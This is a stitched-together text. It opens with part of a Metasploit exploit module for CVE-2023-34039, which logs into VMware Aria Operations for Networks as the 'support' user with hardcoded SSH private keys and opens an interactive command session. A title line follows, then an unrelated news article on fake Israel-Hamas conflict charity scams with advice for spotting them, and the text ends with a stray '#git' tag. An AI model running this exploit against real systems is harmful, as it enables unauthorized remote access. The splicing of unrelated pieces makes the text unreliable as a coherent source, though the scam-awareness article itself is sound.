::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector') } ],            [ '6.4_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform') } ],            [ '6.5_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector') } ],            [ '6.5_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform') } ],            [ '6.6_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector') } ],            [ '6.6_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform') } ],            [ '6.7_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector') } ],            [ '6.7_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform') } ],            [ '6.8_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector') } ],            [ '6.8_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform') } ],            [ '6.9_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector') } ],            [ '6.9_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform') } ],            [ '6.10_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_collector') } ],            [ '6.10_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_platform') } ],            [              'All', {} # built later            ],          ],          'Payload' => {            'Compat' => {              'PayloadType' => 'cmd_interact',              'ConnectionType' => 'find'            }          },          'Author' => [            'h00die', # MSF module            'SinSinology', # PoC            'Harsh Jaiswal (@rootxharsh)', # Discovery            'Rahul Maini (@iamnoooob)' # Discovery          ],          'License' => MSF_LICENSE,          'References' => [            ['CVE', '2023-34039'],            ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],          ],          'DisclosureDate' => '2023-08-29',          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },          'DefaultTarget' => 22,          'Notes' => {            'Stability' => [CRASH_SAFE],            'Reliability' => [REPEATABLE_SESSION],            'SideEffects' => [IOC_IN_LOGS]          }        }      )    )    register_options(      [        # Since we don't include Tcp, we have to register this manually        Opt::RHOST(),        Opt::RPORT(22)      ], self.class    )    register_advanced_options(      [        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),        OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time in seconds to negotiate a SSH session', 30])      ]    )  end  # helper methods that normally come from Tcp  def rhost    datastore['RHOST']  end  def rport    datastore['RPORT']  end  def do_login(user, key_data)    opt_hash = ssh_client_defaults.merge({      auth_methods: ['publickey'],      port: rport,      key_data: [ key_data ]    })    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh_socket = nil      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        ssh_socket = Net::SSH.start(rhost, user, opt_hash)      end    rescue Rex::ConnectionError      print_error "#{rhost}:#{rport} SSH - Unable to connect"      return nil    rescue Net::SSH::Disconnect, ::EOFError      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"      return nil    rescue ::Timeout::Error      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"      return nil    rescue Net::SSH::AuthenticationFailed      print_error "#{rhost}:#{rport} SSH - Failed authentication"      return nil    rescue Net::SSH::Exception => e      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"      return nil    end    if ssh_socket      # Create a new session from the socket, then close it.      conn = Net::SSH::CommandStream.new(ssh_socket)      ssh_socket = nil      return conn    end    nil  end  def exploit    if target.name == 'All'      keys = targets.filter_map { |t| t.opts['key'] if t.name != 'All' }    else      keys = [target.opts['key']]    end    keys.each do |key|      vprint_status("Attempting key: #{key}")      key_data = File.read(key, mode: 'rb')      conn = do_login('support', key_data)      next unless conn      print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"      handler(conn.lsock)      break if datastore['STOP_ON_SUCCESS']    end  endend

VMWare Aria Operations For Networks SSH Private Key Exposure

As the conflict in the Middle East rages, malicious actors look to exploit the situation with bogus charity sites encouraging donations.

Researchers have uncovered hundreds of cyber scams leveraging the Israeli-Hamas conflict, including more than 500 scam emails and fraudulent websites capitalizing on people's willingness to aid those affected by the war.

Many of these emails contain links to scam websites that provide information about the ongoing situation and encourage individuals to make contributions, with the added convenience of various cryptocurrency payment options, according to Kaspersky researchers.

By tracking the wallet addresses used, security experts found additional fraudulent Web pages claiming to collect aid for various groups within the conflict area.

Andrey Kovtun, security expert at Kaspersky, says attackers often attempt to intimidate recipients by threatening severe consequences, such as financial losses, account suspensions, or even legal action, if the potential victims fail to click links, open attachments, or call specified phone numbers.

"Urgency often compels recipients to act swiftly," he adds. "In some instances, such as the recent campaign exploiting the Israeli-Hamas conflict, scammers try to appeal to sympathy, soliciting funds while presenting their actions as noble endeavors."

Callie Guenther, senior manager of cyber threat research at Critical Start, says threat actors have an uncanny ability to adapt their tactics based on current events and societal concerns. This emotional appeal, rooted in compassion and moral responsibility, often overshadows rational decision-making, rendering potential victims more susceptible.

**A Multitude of Tactics**

Fake charity scams often emerge during real disasters, with scammers posing as charitable organizations and using emotional language to lure users in. Tactics include the common methods of multiple text variations to evade spam filters or altered links and sender addresses.

"During conflicts or emergencies, situations can change rapidly, and news travels quickly," Kovtun says. "Fraudulent pages may adapt to the latest developments, such as incorporating current facts or photos to appear more credible."

They can also evolve with more sophisticated designs, aiming to resemble legitimate organizations — for example, they may replicate the visual layout of other well known charities or humanitarian organizations. "Additionally, scammers could add content to the fraudulent websites, for example, news updates, and more, to diversify it with pages other than a money transfer one," Kovtun adds.

**Ferreting Out the Fraud**

To protect against such scams, users are urged to thoroughly scrutinize websites before donating, as fake sites often lack essential information about the organizers, recipients, legitimacy, or transparency regarding fund usage.

"Apart from the simple use of a search engine to find reports of an organization being a scam, look up the provenance of the domain names involved using whois.com or another domain registrar's records," Hamilton advises. "If domains were recently registered it is less likely that the organizations are legitimate."

He also recommends looking for the owner of the IP address space used by the Web properties involved and the country where the hosting service originates.

"Legitimate charity organizations' websites rarely consist of a single page," Kovtun points outs. "Encountering such a landing page should prompt a search for the organization's name to explore the search results."

Upon discovering additional information in the search results, it is advisable to cross-reference the recipient's details on the website received in the email with the information on the official site from search results.

"Spelling or grammar errors often serve as indicators of fraudulent pages," Kovtun says. "If there is still uncertainty about the organizations you have checked, it is better to donate to well-known humanitarian support organizations."

Guenther says it's also beneficial to remember that while the guise may change — be it the Israeli-Hamas conflict, the Haiti earthquake, or the Syrian Refugee Crisis — the underlying strategies remain consistent. "Being informed and maintaining a healthy skepticism can be our strongest defenses against these opportunistic scams," she notes.

Tag

#git